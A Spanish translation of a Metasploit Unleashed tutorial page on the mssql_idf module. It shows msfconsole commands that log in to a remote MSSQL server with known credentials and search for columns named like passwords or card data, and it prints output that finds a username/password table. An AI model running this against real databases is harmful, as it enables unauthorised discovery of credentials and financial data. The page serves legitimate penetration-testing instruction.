Mssql/mssql idf
De www.metasploit-es.com.ar
El modulo "mssql_idf" (Buscador de Datos Interesantes) conectara a un servidor MSSQL remoto utilizando un conjunto de credenciales y buscara filas y columnas con nombres "interesantes". Esta informacion te puede ayudar a afinar posteriores ataques contra la base de datos.
msf > use auxiliary/admin/mssql/mssql_idf msf auxiliary(mssql_idf) > show options Module options (auxiliary/admin/mssql/mssql_idf): Name Current Setting Required Description ---- --------------- -------- ----------- NAMES passw|bank|credit|card yes Pipe separated list of column names PASSWORD no The password for the specified username RHOST yes The target address RPORT 1433 yes The target port USERNAME sa no The username to authenticate as
Para configurar el modulo, lo configuraremos para buscar nombres de campo como 'username' y 'password', junto con una contraseña conocida del sistema, y nuestro valor RHOST.
msf auxiliary(mssql_idf) > set NAMES username|password NAMES => username|password msf auxiliary(mssql_idf) > set PASSWORD password1 PASSWORD => password1 msf auxiliary(mssql_idf) > set RHOST 192.168.1.195 RHOST => 192.168.1.195 msf auxiliary(mssql_idf) > run Database Schema Table Column Data Type Row Count ======== ====== ============== ===================== ========= ========= ======== ====== ============== ===================== ========= ========= msdb dbo sysmail_server username nvarchar 0 msdb dbo backupmediaset is_password_protected bit 0 msdb dbo backupset is_password_protected bit 0 logins dbo userpass username varchar 3 logins dbo userpass password varchar 3 [*] Auxiliary module execution completed msf auxiliary(mssql_idf) >
Como puede verse en la salida del modulo, el escaneador encontro la base de datos 'logins' con una tabla 'userpass' que contiene columnas con nombres de usuario y contraseñas.
© Offensive Security 2009
Original de www.offensive-security.com Traducido por cbk999
